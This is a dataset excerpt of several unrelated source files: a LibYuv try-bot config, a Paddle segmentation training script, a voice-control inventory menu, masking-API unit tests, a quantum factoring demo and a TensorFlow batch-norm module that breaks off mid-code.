filename | text
---|---
the-stack_106_15771
|
# Copyright 2014 The LibYuv Project Authors. All rights reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
import re
import sys
def GetDefaultTryConfigs(bots=None):
"""Returns a list of ('bot', set(['tests']), optionally filtered by [bots].
For WebRTC purposes, we always return an empty list of tests, since we want
to run all tests by default on all our trybots.
"""
return { 'tryserver.libyuv': dict((bot, []) for bot in bots)}
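# Example of the returned structure, using bot names from the list below:
#   GetDefaultTryConfigs(['win', 'linux_rel'])
#   -> {'tryserver.libyuv': {'win': [], 'linux_rel': []}}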
# pylint: disable=W0613
def GetPreferredTryMasters(project, change):
files = change.LocalPaths()
bots = [
'win',
'win_rel',
'win_x64_rel',
'win_clang',
'win_clang_rel',
'win_x64_clang_rel',
'mac',
'mac_rel',
'mac_asan',
'ios',
'ios_rel',
'ios_arm64',
'ios_arm64_rel',
'linux',
'linux_rel',
'linux_memcheck',
'linux_tsan2',
'linux_asan',
'linux_msan',
'linux_ubsan',
'linux_ubsan_vptr',
'android',
'android_rel',
'android_clang',
'android_arm64',
'android_mips',
'android_x64',
'android_x86',
]
if not files or all(re.search(r'[\\/]OWNERS$', f) for f in files):
return {}
return GetDefaultTryConfigs(bots)
|
the-stack_106_15772
|
import logging
import os
import time
import timeit
import numpy as np
import matplotlib.pyplot as plt
from argparse import ArgumentParser
import paddle
import paddle.nn as nn
# user
from builders.model_builder import build_model
from builders.dataset_builder import build_dataset_train
from utils.utils import setup_seed, init_weight, netParams, init_logger
from utils.metric import get_iou
from utils.loss import CrossEntropyLoss2d, ProbOhemCrossEntropy2d
from utils.lr_scheduler import WarmupPolyLR
GLOBAL_SEED = 1234
def val(args, val_loader, model, logger):
"""
args:
val_loader: loaded for validation dataset
model: model
return: mean IoU and IoU class
"""
# evaluation mode
model.eval()
total_batches = len(val_loader)
data_list = []
for i, (input, label, size, name) in enumerate(val_loader):
start_time = time.time()
with paddle.no_grad():
output = model(input)
time_taken = time.time() - start_time
if (i + 1) % 100 == 0:
logger.info("[{}/{}] time: {:.4f}".format(i + 1, total_batches, time_taken))
output = output[0].numpy()
gt = label.numpy()[0].astype(np.uint8)
output = output.transpose(1, 2, 0)
output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)
data_list.append([gt.flatten(), output.flatten()])
meanIoU, per_class_iu = get_iou(data_list, args.classes)
model.train()
return meanIoU, per_class_iu
def train(args, train_loader, model, criterion, optimizer, scheduler, epoch, logger):
"""
args:
train_loader: loaded for training dataset
model: model
criterion: loss function
optimizer: optimization algorithm, such as ADAM or SGD
epoch: epoch number
return: average loss, per class IoU, and mean IoU
"""
epoch_loss = []
total_batches = len(train_loader)
logger.info("=====> the number of iterations per epoch: {}".format(total_batches))
st = time.time()
for iteration, batch in enumerate(train_loader, 0):
lr = optimizer.get_lr()
start_time = time.time()
images, labels, _, _ = batch
output = model(images)
loss = criterion(output, labels)
optimizer.clear_grad() # set the grad to zero
loss.backward()
optimizer.step()
scheduler.step()
epoch_loss.append(loss.item())
time_taken = time.time() - start_time
if (iteration + 1) % args.print_batch_step == 0:
logger.info('=====> epoch[{}/{}] iter: [{}/{}] cur_lr: {:.6f} loss: {:.6f} time:{:.4f}'.format(epoch + 1,
args.max_epochs,
iteration + 1,
total_batches,
lr,
loss.item(),
time_taken))
time_taken_epoch = time.time() - st
remain_time = time_taken_epoch * (args.max_epochs - 1 - epoch)
m, s = divmod(remain_time, 60)
h, m = divmod(m, 60)
logger.info("Remaining training time = {} hour {} minutes {} seconds".format(h, m, s))
average_epoch_loss_train = sum(epoch_loss) / len(epoch_loss)
return average_epoch_loss_train, lr
def train_model(args, logger):
"""
args:
args: global arguments
"""
h, w = map(int, args.input_size.split(','))
args.input_size = (h, w)
logger.info("=====> input size:{}".format(args.input_size))
logger.info(args)
if args.cuda:
logger.info("=====> use gpu id: '{}'".format(args.gpus))
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus
if not paddle.is_compiled_with_cuda():
raise Exception("No GPU found or Wrong gpu id, please run without --cuda")
# set the seed
setup_seed(GLOBAL_SEED)
logger.info("=====> set Global Seed: {}".format(GLOBAL_SEED))
# build the model and initialization
model = build_model(args.model, num_classes=args.classes)
init_weight(model, nn.initializer.KaimingNormal(), nn.BatchNorm2D, 1e-3, 0.1)
logger.info("=====> computing network parameters and FLOPs")
total_paramters = netParams(model)
logger.info("the number of parameters: {} ==> {} M".format(total_paramters, (total_paramters / 1e6)))
# load data and data augmentation
datas, trainLoader, valLoader = build_dataset_train(args)
logger.info('=====> Dataset statistics')
logger.info("data['classWeights']: {}".format(datas['classWeights']))
logger.info('mean and std: {}, {}'.format(datas['mean'], datas['std']))
# define loss function, respectively
weight = paddle.to_tensor(datas['classWeights'])
if args.dataset == 'camvid':
criteria = CrossEntropyLoss2d(weight=weight, ignore_label=ignore_label)
elif args.dataset == 'cityscapes':
min_kept = int(args.batch_size // len(args.gpus) * h * w // 16)
criteria = ProbOhemCrossEntropy2d(use_weight=True, ignore_label=ignore_label,
thresh=0.7, min_kept=min_kept)
else:
raise NotImplementedError(
"This repository now supports two datasets: cityscapes and camvid, {} is not included".format(args.dataset))
start_epoch = 1
# continue training
if args.checkpoint:
if os.path.isfile(args.checkpoint):
checkpoint = paddle.load(args.checkpoint)
start_epoch = checkpoint['epoch']
model.set_state_dict(checkpoint['model'])
logger.info("=====> loaded checkpoint '{}' (epoch {})".format(args.checkpoint, checkpoint['epoch']))
else:
logger.info("=====> no checkpoint found at '{}'".format(args.checkpoint))
model.train()
logger.info("Parameters: {} Seed: {}".format(str(total_paramters), GLOBAL_SEED))
# define optimization criteria
args.per_iter = len(trainLoader)
scheduler = WarmupPolyLR(learning_rate=args.lr, step_each_epoch=len(trainLoader),
epochs=args.max_epochs, warmup_epoch=500 / len(trainLoader), power=0.9)()
if args.dataset == 'camvid':
optimizer = paddle.optimizer.Adam(learning_rate=scheduler, parameters=model.parameters(),
weight_decay=2e-4)
elif args.dataset == 'cityscapes':
optimizer = paddle.optimizer.Momentum(learning_rate=scheduler, parameters=model.parameters(), momentum=0.9,
weight_decay=1e-4)
else:
raise NotImplementedError
lossTr_list = []
epoches = []
mIOU_val_list = []
best_metric = {'mIOU': 0, 'epoch': 0}
logger.info('=====> beginning training')
for epoch in range(start_epoch, args.max_epochs):
# training
lossTr, lr = train(args, trainLoader, model, criteria, optimizer, scheduler, epoch, logger)
lossTr_list.append(lossTr)
model_file_name = os.path.join(args.savedir, 'latest.params')
state = {"epoch": epoch + 1, "model": model.state_dict()}
paddle.save(state, model_file_name)
# validation
if epoch % args.eval_epoch == 0 or epoch == (args.max_epochs - 1):
epoches.append(epoch)
mIOU_val, per_class_iu = val(args, valLoader, model, logger)
mIOU_val_list.append(mIOU_val)
# record train information
logger.info("Epoch : {} Details".format(str(epoch)))
logger.info("Epoch No.: {}\tTrain Loss = {:.6f}\t mIOU(val) = {:.6f}\t lr= {:.6f}".format(epoch,
lossTr,
mIOU_val, lr))
if best_metric['mIOU'] < mIOU_val:
best_metric = {'mIOU': mIOU_val, 'epoch': epoch + 1}
model_file_name = os.path.join(args.savedir, 'best.params')
paddle.save(state, model_file_name)
logger.info('cur mIOU: {:.6f}, best mIOU: {:.6f}'.format(mIOU_val, best_metric['mIOU']))
else:
# record train information
logger.info("Epoch : " + str(epoch) + ' Details')
logger.info("Epoch No.: {}\tTrain Loss = {:.6f}\t lr= {:.6f}".format(epoch, lossTr, lr))
# draw plots for visualization
if epoch % 50 == 0 or epoch == (args.max_epochs - 1):
# Plot the figures per 50 epochs
fig1, ax1 = plt.subplots(figsize=(11, 8))
ax1.plot(range(start_epoch, epoch + 1), lossTr_list)
ax1.set_title("Average training loss vs epochs")
ax1.set_xlabel("Epochs")
ax1.set_ylabel("Current loss")
plt.savefig(args.savedir + "loss_vs_epochs.png")
plt.clf()
fig2, ax2 = plt.subplots(figsize=(11, 8))
ax2.plot(epoches, mIOU_val_list, label="Val IoU")
ax2.set_title("Average IoU vs epochs")
ax2.set_xlabel("Epochs")
ax2.set_ylabel("Current IoU")
plt.legend(loc='lower right')
plt.savefig(args.savedir + "iou_vs_epochs.png")
plt.close('all')
if __name__ == '__main__':
start = timeit.default_timer()
parser = ArgumentParser()
parser.add_argument('--model', default="DABNet", help="model name: Context Guided Network (CGNet)")
parser.add_argument('--dataset', default="cityscapes", help="dataset: cityscapes or camvid")
parser.add_argument('--data_root', default="", help="dataset folder")
    parser.add_argument('--train_file', default="dataset/cityscapes/cityscapes_train_list.txt", help="path to the training image list file")
    parser.add_argument('--val_file', default="dataset/cityscapes/cityscapes_val_list.txt", help="path to the validation image list file")
    parser.add_argument('--inform_data_file', default="dataset/inform/cityscapes_inform.pkl", help="path to the pickled dataset statistics (class weights, mean, std)")
parser.add_argument('--max_epochs', type=int, default=1000,
help="the number of epochs: 300 for train set, 350 for train+val set")
parser.add_argument('--input_size', type=str, default="512,1024", help="input size of model")
parser.add_argument('--random_mirror', type=bool, default=True, help="input image random mirror")
parser.add_argument('--random_scale', type=bool, default=True, help="input image resize 0.5 to 2")
parser.add_argument('--num_workers', type=int, default=4, help=" the number of parallel threads")
parser.add_argument('--lr', type=float, default=4.5e-2, help="initial learning rate")
parser.add_argument('--batch_size', type=int, default=8, help="the batch size is set to 16 for 2 GPUs")
parser.add_argument('--savedir', default="./checkpoint/", help="directory to save the model snapshot")
parser.add_argument('--checkpoint', type=str, default="",
help="use this file to load last checkpoint for continuing training")
parser.add_argument('--classes', type=int, default=19,
help="the number of classes in the dataset. 19 and 11 for cityscapes and camvid, respectively")
parser.add_argument('--cuda', type=bool, default=True, help="running on CPU or GPU")
parser.add_argument('--gpus', type=str, default="0", help="default GPU devices (0,1)")
    parser.add_argument('--print_batch_step', type=int, default=10, help="log training status every N iterations")
    parser.add_argument('--eval_epoch', type=int, default=50, help="run validation every N epochs")
args = parser.parse_args()
if args.dataset == 'cityscapes':
args.classes = 19
args.input_size = '512,1024'
ignore_label = 255
elif args.dataset == 'camvid':
args.classes = 11
args.input_size = '360,480'
ignore_label = 11
else:
raise NotImplementedError(
"This repository now supports two datasets: cityscapes and camvid, %s is not included" % args.dataset)
if not os.path.exists(args.savedir):
os.makedirs(args.savedir)
logFileLoc = os.path.join(args.savedir, 'train.log')
logger = init_logger(logFileLoc)
train_model(args, logger)
end = timeit.default_timer()
hour = 1.0 * (end - start) / 3600
minute = (hour - int(hour)) * 60
logger.info("training time: %d hour %d minutes" % (int(hour), int(minute)))
|
the-stack_106_15773
|
import dragonfly as df
import title_menu, menu_utils, server, df_utils, game, letters, items
from game_menu import game_menu
inventory_wrapper = menu_utils.InventoryMenuWrapper()
def get_inventory_page(menu):
page = game_menu.get_page_by_name(menu, 'inventoryPage')
return page
async def focus_item(page, new_row, new_col):
menu = page['inventory']
await inventory_wrapper.focus_box(menu, new_row, new_col)
async def click_equipment_icon(page, item):
cmp = menu_utils.find_component_by_field(page['equipmentIcons'], 'name', item["name"])
await menu_utils.focus_component(cmp)
with server.player_items_stream() as stream:
player_items = await stream.next()
if player_items['cursorSlotItem'] and not player_items['equippedItems'][item['field']]:
await menu_utils.click_component(cmp)
else:
await menu_utils.focus_component(cmp)
mapping = {
"item <positive_index>": df_utils.async_action(focus_item, None, 'positive_index'),
"row <positive_index>": df_utils.async_action(focus_item, 'positive_index', None),
"trash can": menu_utils.simple_click("trashCan"),
"<equipment_icons>": df_utils.async_action(click_equipment_icon, 'equipment_icons'),
}
equipment_icons = {
"boots": {"name": "Boots", "field": "boots"},
"hat": {"name": "Hat", "field": "hat"},
"pants": {"name": "Pants", "field": "pants"},
"left ring | ring one": {"name": "Left Ring", "field": "leftRing"},
"right ring | ring to": {"name": "Right Ring", "field": "rightRing"},
"shirt": {"name": "Shirt", "field": "shirt"},
}
def load_grammar():
extras = [
df_utils.positive_index,
items.craftable_items_choice,
df.Choice('equipment_icons', equipment_icons)
]
grammar = menu_utils.build_menu_grammar('inventory_page', mapping, get_inventory_page, extras=extras)
grammar.load()
|
the-stack_106_15774
|
from unittest import TestCase
from unittest import main
import mock
import sys
from masking_api_60.api.application_api import ApplicationApi
from masking_api_60.models.application import Application
from masking_api_60.models.application_list import ApplicationList
from masking_api_60.models.page_info import PageInfo
from dxm.lib.DxApplication.DxApplicationList import DxApplicationList
from dxm.lib.DxEngine.DxMaskingEngine import DxMaskingEngine
from dxm.lib.DxApplication.app_worker import application_add
from dxm.lib.DxApplication.app_worker import application_list
def app_load(a, b, **kwargs):
"""
Create an output for get_all_application call
"""
pi = PageInfo(number_on_page=2, total=2)
applist = [Application(application_name="App1"), Application(application_name="App2"), Application(application_name="App3", application_id=3)]
apo = ApplicationList(page_info=pi, response_list=applist)
return apo
class TestApp(TestCase):
@mock.patch("dxm.lib.DxApplication.DxApplicationList.paginator", app_load)
def setUp(self):
self.dal = DxApplicationList()
self.dal.LoadApplications()
def test_application_add(self):
with mock.patch.object(
ApplicationApi, 'create_application',
return_value=None) as mock_method, \
mock.patch.object(
DxMaskingEngine, 'get_session',
return_value=None):
application_add(None, "Test1")
name, args, kwargs = mock_method.mock_calls[0]
self.assertEqual("Test1", args[0].application_name)
@mock.patch("dxm.lib.DxApplication.DxApplicationList.paginator", app_load)
def test_application_list(self):
with mock.patch.object(
DxMaskingEngine, 'get_session',
return_value=None):
application_list(None, "csv", "App1")
if not hasattr(sys.stdout, "getvalue"):
self.fail("need to run in buffered mode")
output = sys.stdout.getvalue().strip()
            self.assertEqual(
                output, '#Engine name,Application name\r\ntesteng,App1')
def test_get_applicationId_by_name(self):
self.assertEqual("App1", self.dal.get_applicationId_by_name("App1")[0])
def test_get_applicationId_by_name2(self):
self.assertEqual(3, self.dal.get_applicationId_by_name("App3")[0])
if __name__ == '__main__':
main(buffer=True, verbosity=2)
|
the-stack_106_15776
|
# Copyright 2021 SpinQ Technology Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from spinqkit import get_basic_simulator, get_compiler, BasicSimulatorConfig
from spinqkit import Circuit, GateBuilder, ControlledGate, QuantumRegister
from spinqkit import SWAP, H, X, CP
import numpy as np
from fractions import Fraction
from math import gcd
import random
def create_control_u(a, power):
amod15_builder = GateBuilder(4)
for iteration in range(power):
if a in [2,13]:
amod15_builder.append(SWAP, [0,1])
amod15_builder.append(SWAP, [1,2])
amod15_builder.append(SWAP, [2,3])
if a in [7,8]:
amod15_builder.append(SWAP, [2,3])
amod15_builder.append(SWAP, [1,2])
amod15_builder.append(SWAP, [0,1])
if a == 11:
amod15_builder.append(SWAP, [1,3])
amod15_builder.append(SWAP, [0,2])
if a in [7,11,13]:
for q in range(4):
amod15_builder.append(X, [q])
amod15 = amod15_builder.to_gate()
c_amod15 = ControlledGate(amod15)
return c_amod15
def qft_dagger(circ: Circuit, qreg: QuantumRegister, n: int):
for qubit in range(n//2):
circ << (SWAP, (qreg[qubit], qreg[n-qubit-1]))
for j in range(n):
for m in range(j):
circ << (CP, (qreg[m], qreg[j]), -np.pi/float(2**(j-m)))
circ << (H, qreg[j])
def qpe_amod15(a):
n_count = 8
circ = Circuit()
qreg = circ.allocateQubits(4+n_count)
for q in range(n_count):
circ << (H, qreg[q])
circ << (X, qreg[3+n_count])
for q in range(n_count):
qarg = [qreg[q]] + [qreg[i+n_count] for i in range(4)]
circ << (create_control_u(a, 2**q), qarg)
qft_dagger(circ, qreg, n_count)
engine = get_basic_simulator()
comp = get_compiler("native")
exe = comp.compile(circ, 0)
config = BasicSimulatorConfig()
config.configure_shots(1024)
config.configure_measure_qubits(list(range(n_count)))
result = engine.execute(exe, config)
readings = result.get_readings()
    # random.randint is inclusive on both ends, so cap the index at len(readings) - 1
    idx = random.randint(0, len(readings) - 1)
print('reading: ' + readings[idx])
phase = int(readings[idx][::-1], 2) / (2**n_count)
print('phase: ' + str(phase))
return phase
N = 15
a = 7
factor_found = False
attempt = 0
while not factor_found and attempt < 10:
attempt += 1
phase = qpe_amod15(a)
frac = Fraction(phase).limit_denominator(N)
r = frac.denominator
print("Result: r = %i" % r)
if phase != 0:
guesses = [gcd(a**(r//2)-1, N), gcd(a**(r//2)+1, N)]
factor_num = 0
for guess in guesses:
if guess not in [1,N] and (N % guess) == 0: # Check to see if guess is a factor
print("*** Non-trivial factor found: %i ***" % guess)
factor_num += 1
if factor_num == 2 and guesses[0] * guesses[1] == N:
factor_found = True
print("Guessed Factors: %i and %i" % (guesses[0], guesses[1]))
|
the-stack_106_15777
|
# Copyright 2017 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Batch normalization module for Sonnet.
This contains the module BatchNorm, which performs batch normalization on
its inputs. It has an optional post-normalization scale and offset, and it
maintains moving averages of the statistics for use at test time.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
from sonnet.python.modules import base
from sonnet.python.modules import util
import tensorflow as tf
from tensorflow.python.layers import utils
from tensorflow.python.training import moving_averages
def create_beta_initializer():
"""Returns a default initializer for the `beta` in batch norm."""
return tf.zeros_initializer()
def create_gamma_initializer():
"""Returns a default initializer for the `gamma` in batch norm."""
return tf.ones_initializer()
def create_mean_initializer():
"""Returns a default initializer for the `moving_mean` in batch norm."""
return tf.zeros_initializer()
def create_variance_initializer():
"""Returns a default initializer for the `moving_variance` in batch norm."""
return tf.ones_initializer()
class BatchNorm(base.AbstractModule):
"""Batch normalization module, including optional affine transformation.
This module maintains exponential moving averages of the mean and
variance, which can be optionally used to normalize at test time.
At training time, batch statistics (mean, variance) are not shared between
separate connections. The moving averages are shared between separate
connections. At both training and test time, the optional affine
transformation (`* gamma + beta`) is shared between separate connections.
This is also the case for distributed replica training, where the batch
statistics are not aggregated across replicas, but the moving averages are
shared globally.
When connecting the module to the graph, `is_training=True` means that
- Update ops are created to update the moving averages with the current
batch's statistics.
- Features are normalized using the *current batch's statistics*. The
`test_local_stats` setting is ignored. The moving averages are
**not** used.
whereas `is_training=False` means that
- Update ops are not created.
- Features are normalized using either:
- The test batch statistics if `test_local_stats=True` (default).
- The moving averages if `test_local_stats=False`.
Local batch statistics are used by default at test time, but the moving
averages can be used by specifying a flag when connecting. One often wants
to use local batch statistics at test time to track the progress while the
model is trained as it would ensure that moving average updates do not affect
the training curves. Once the training is finished, it's often advantageous
to use moving average statistics, since it would make evaluation agnostic to
the batch size, and might even lead to small improvements over the local
batch statistics.
You can either update the moving averages automatically by setting
`update_ops_collection=None` or by running the ops in the given collection,
by default tf.GraphKeys.UPDATE_OPS.
For example, to run the updates automatically:
bn = BatchNorm(update_ops_collection=None)
train_net = bn(train_inputs, is_training=True)
this does, however, have the effect of blocking the forwards pass of the
network until the update ops have been run and may have a small performance
penalty.
For example, to run the updates manually:
bn = BatchNorm()
train_net = bn(train_inputs, is_training=True)
...
update_ops = tf.group(*tf.get_collection(tf.GraphKeys.UPDATE_OPS))
train_op = tf.group(train_op, update_ops)
Then, whenever `train_op` is run so also are the moving average update ops.
Some batch normalization caveats:
- Batch normalization will remove the effect of adding a bias, so e.g.
`use_bias=False` should be used for an immediately preceding snt.Linear
module.
- If your data batches aren't i.i.d. then batch normalization can allow your
network to 'cheat' by using the batch statistics to peek at the rest of
the batch. This can exhibit itself as a higher test score with
`test_local_stats=True` than `test_local_stats=False`.
"""
GAMMA = "gamma"
BETA = "beta"
MOVING_MEAN = "moving_mean"
MOVING_VARIANCE = "moving_variance"
POSSIBLE_INITIALIZER_KEYS = {GAMMA, BETA, MOVING_MEAN, MOVING_VARIANCE}
POSSIBLE_PARTITIONER_KEYS = {GAMMA, BETA}
POSSIBLE_REGULARIZER_KEYS = {GAMMA, BETA}
def __init__(
self,
axis=None,
offset=True,
scale=False,
decay_rate=0.999,
eps=1e-3,
initializers=None,
partitioners=None,
regularizers=None,
update_ops_collection="update_ops",
fused=False,
name="batch_norm",
):
"""Constructs a BatchNorm module.
By default reduces over all input tensor dimensions apart from the final
dimension. This has the effect of treating pixels in 1D/2D/3D images as
additional elements of the minibatch.
If this is not the desired behaviour, the user can specify the tensor
indices to reduce over with `axis`.
Args:
axis: Optional iterable of indices of dimensions to reduce over. By
default `None` and all dimensions except the last are reduced over.
offset: Optional boolean to specify whether or not to apply a trained
component-wise bias after the batch normalization and scaling.
scale: Optional boolean to specify whether or not to apply a trained
component-wise scale after the batch normalization.
decay_rate: Decay rate of the exponential moving averages of the mean
and variance.
eps: Small number to avoid dividing by zero when diving by the standard
deviation.
initializers: Optional dict containing ops to initialize the weights of
the affine transform (`gamma` and `beta`).
partitioners: Optional dict containing partitioners to partition the
weights of the affine transform (`gamma` and `beta`).
regularizers: Optional dict containing regularizers for the weights of the
affine transform ('gamma' and 'beta'). As a default, no regularizers are
used. A regularizer should be a function that takes a single `Tensor` as
an input and returns a scalar `Tensor` output, e.g. the L1 and L2
regularizers in `tf.contrib.layers`.
update_ops_collection: Name of TensorFlow variable collection to add the
moving average update ops to. If `None`, we instead add the update ops
as control dependencies of the output of the module. This may result in
some slowdown, as the feed-forward of the network is now blocked. By
default, `tf.GraphKeys.UPDATE_OPS`.
fused: Use nn.fused_batch_norm if True, nn.batch_normalization otherwise.
name: Name of the module.
Raises:
KeyError: If `initializers` contains any keys other than `gamma`, `beta`,
`moving_mean` or `moving_variance`.
KeyError: If `partitioners` or `regularizers` contains any keys other
than `gamma` or `beta`.
TypeError: If any of the given initializers, partitioners or regularizers
are not callable.
"""
super(BatchNorm, self).__init__(name=name)
self._axis = axis
self._offset = offset
self._scale = scale
self._decay_rate = decay_rate
self._eps = eps
self._update_ops_collection = update_ops_collection
self._fused = fused
self._initializers = util.check_initializers(initializers, self.POSSIBLE_INITIALIZER_KEYS)
self._partitioners = util.check_partitioners(partitioners, self.POSSIBLE_PARTITIONER_KEYS)
self._regularizers = util.check_regularizers(regularizers, self.POSSIBLE_REGULARIZER_KEYS)
def _build_statistics(self, input_batch, axis, use_batch_stats, stat_dtype):
"""Builds the statistics part of the graph when using moving variance.
Args:
input_batch: Input batch Tensor.
axis: Indices of `input_batch` to reduce over.
use_batch_stats: Boolean to indicate if batch statistics should be
calculated, otherwise moving averages are returned.
stat_dtype: TensorFlow datatype to use for the moving mean and variance.
Returns:
Tuple of (mean, variance), each of the same datatype as `input_batch`.
"""
# Set up our moving statistics. When connecting in parallel, this is shared.
if self.MOVING_MEAN not in self._initializers:
self._initializers[self.MOVING_MEAN] = create_mean_initializer()
self._moving_mean = tf.get_variable(
"moving_mean",
dtype=stat_dtype,
shape=self._mean_shape,
collections=[
tf.GraphKeys.MOVING_AVERAGE_VARIABLES,
tf.GraphKeys.GLOBAL_VARIABLES,
],
initializer=self._initializers[self.MOVING_MEAN],
trainable=False,
)
if self.MOVING_VARIANCE not in self._initializers:
self._initializers[self.MOVING_VARIANCE] = create_variance_initializer()
self._moving_variance = tf.get_variable(
"moving_variance",
dtype=stat_dtype,
shape=self._mean_shape,
collections=[
tf.GraphKeys.MOVING_AVERAGE_VARIABLES,
tf.GraphKeys.GLOBAL_VARIABLES,
],
initializer=self._initializers[self.MOVING_VARIANCE],
trainable=False,
)
def build_batch_stats():
"""Builds the batch statistics calculation ops."""
mean, variance = tf.nn.moments(input_batch, axis, keep_dims=True, name="normalize_moments")
return mean, variance
def build_moving_stats():
"""Retrieves the moving statistics."""
# If necessary, cast the moving statistics to match the input type.
# This is required by tf.nn.batch_normalization.
input_dtype = input_batch.dtype.base_dtype
if stat_dtype == input_dtype:
return (
tf.identity(self._moving_mean),
tf.identity(self._moving_variance),
)
else:
return (
tf.cast(self._moving_mean, input_dtype),
tf.cast(self._moving_variance, input_dtype),
)
mean, variance = utils.smart_cond(
use_batch_stats,
build_batch_stats,
build_moving_stats,
)
return mean, variance
def _build_update_ops(self, mean, variance, is_training):
"""Builds the moving average update ops when using moving variance.
Args:
mean: The mean value to update with.
variance: The variance value to update with.
is_training: Boolean Tensor to indicate if we're currently in
training mode.
Returns:
Tuple of `(update_mean_op, update_variance_op)` when `is_training` is or
could be `True`. Returns `None` when `is_training=False`.
"""
def build_update_ops():
"""Builds the exponential moving average update ops."""
update_mean_op = moving_averages.assign_moving_average(
variable=self._moving_mean,
value=mean,
decay=self._decay_rate,
zero_debias=False,
name="update_moving_mean",
).op
update_variance_op = moving_averages.assign_moving_average(
variable=self._moving_variance,
value=variance,
decay=self._decay_rate,
zero_debias=False,
name="update_moving_variance",
).op
return update_mean_op, update_variance_op
def build_no_ops():
return (tf.no_op(), tf.no_op())
# Only make the ops if we know that `is_training=True`, or the value of
# `is_training` is unknown.
is_training_const = utils.constant_value(is_training)
if is_training_const is None or is_training_const:
update_mean_op, update_variance_op = utils.smart_cond(
is_training,
build_update_ops,
build_no_ops,
)
return (update_mean_op, update_variance_op)
else:
return None
def _infer_fused_data_format(self, input_batch):
"""Infers the data format for the fused batch norm.
It uses the axis option to infer this information. Specifically, the
axis value (0, 1, 2) corresponds to data format NHWC and the
axis value (0, 2, 3) to data format NCHW.
Args:
input_batch: A Tensor of arbitrary dimension.
Returns:
A string description of the data format NHWC or NCHW.
Raises:
NotImplementedError: for input of dimensionality different from 4.
ValueError: for axis configuration different from (0, 1, 2) and (0, 2, 3).
"""
input_shape = input_batch.get_shape().as_list()
input_shape_len = len(input_shape)
if input_shape_len != 4:
raise NotImplementedError(
"fused batch norm supports only input with "
"4 dimensions, it received input of "
"dimensionality {:d}".format(input_shape_len)
)
axis = range(input_shape_len)[:-1] if self._axis is None else self._axis
axis = tuple(axis)
if axis == (0, 1, 2):
# Reduce over the last dimension.
return "NHWC"
elif axis == (0, 2, 3):
# Reduce over the second dimension.
return "NCHW"
else:
raise ValueError(
"Invalid axis option {}. This does not correspond to"
" either the NHWC format (0, 1, 2) or the NCHW "
"(0, 2, 3).".format(axis)
)
def _fused_batch_norm_op(self, input_batch, mean, variance, use_batch_stats):
"""Creates a fused batch normalization op."""
# Store the original shape of the mean and variance.
mean_shape = mean.get_shape()
variance_shape = variance.get_shape()
# The fused batch norm expects the mean, variance, gamma and beta
# tensors to have dimension 1, so we flatten them to remove the
# extra dimensions.
gamma_flatten = tf.reshape(self._gamma, shape=(-1,))
beta_flatten = tf.reshape(self._beta, shape=(-1,))
flatten_mean = tf.reshape(mean, shape=(-1,))
flatten_variance = tf.reshape(variance, shape=(-1,))
use_batch_stats = tf.convert_to_tensor(use_batch_stats)
common_args = {
"scale": gamma_flatten,
"offset": beta_flatten,
"epsilon": self._eps,
"data_format": self._infer_fused_data_format(input_batch),
"name": "batch_norm",
}
def use_batch_stats_fused_batch_norm():
return tf.nn.fused_batch_norm(
input_batch,
mean=None,
variance=None,
is_training=True,
**common_args,
)
def moving_average_fused_batch_norm():
return tf.nn.fused_batch_norm(
input_batch,
mean=flatten_mean,
variance=flatten_variance,
is_training=False,
**common_args,
)
batch_norm_op, mean, variance = utils.smart_cond(
use_batch_stats,
use_batch_stats_fused_batch_norm,
moving_average_fused_batch_norm,
)
mean = tf.reshape(mean, mean_shape)
variance = tf.reshape(variance, variance_shape)
return batch_norm_op, mean, variance
def _batch_norm_op(self, input_batch, mean, variance, use_batch_stats, stat_dtype):
"""Creates a batch normalization op.
It uses the tf.nn.batch_normalization op by default and the
tf.nn.fused_batch_norm op to support fused batch normalization.
Args:
input_batch: A input Tensor of arbitrary dimension.
mean: A mean tensor, of the same dtype as `input_batch`.
variance: A variance tensor, of the same dtype as `input_batch`.
use_batch_stats: A bool value that indicates whether the operation should
use the batch statistics.
stat_dtype: TensorFlow datatype used for the moving mean and variance.
Returns:
A batch normalization operation.
The current mean tensor, of datatype `stat_dtype`.
The current variance tensor, of datatype `stat_dtype`.
"""
if self._fused:
# For the non-training case where not using batch stats,
# pass in the moving statistic variables directly.
# These will already be in the correct dtype, even for float16 input.
batch_norm_op, mean, variance = self._fused_batch_norm_op(
input_batch,
self._moving_mean,
self._moving_variance,
use_batch_stats,
)
else:
batch_norm_op = tf.nn.batch_normalization(
input_batch,
mean,
variance,
self._beta,
self._gamma,
self._eps,
name="batch_norm",
)
# We'll echo the supplied mean and variance so that they can also be used
# to update the moving statistics. Cast to matching type if necessary.
if input_batch.dtype.base_dtype != stat_dtype:
mean = tf.cast(mean, stat_dtype)
variance = tf.cast(variance, stat_dtype)
return batch_norm_op, mean, variance
def _build_scale_offset(self, dtype):
"""Sets up optional scale and offset factors."""
# tf.nn.fused_batch_norm accepts float16 batch data, but not scale/offset.
if self._fused and dtype == tf.float16:
dtype = tf.float32
# The fused batch norm operation needs the beta, gamma variables,
# so in this case we build them and set the trainable option according
# to the values of _offset and _scale.
self._beta = None
if self._offset or self._fused:
if self.BETA not in self._initializers:
self._initializers[self.BETA] = create_beta_initializer()
self._beta = tf.get_variable(
self.BETA,
dtype=dtype,
shape=self._mean_shape,
initializer=self._initializers[self.BETA],
partitioner=self._partitioners.get(self.BETA, None),
regularizer=self._regularizers.get(self.BETA, None),
trainable=self._offset,
)
self._gamma = None
if self._scale or self._fused:
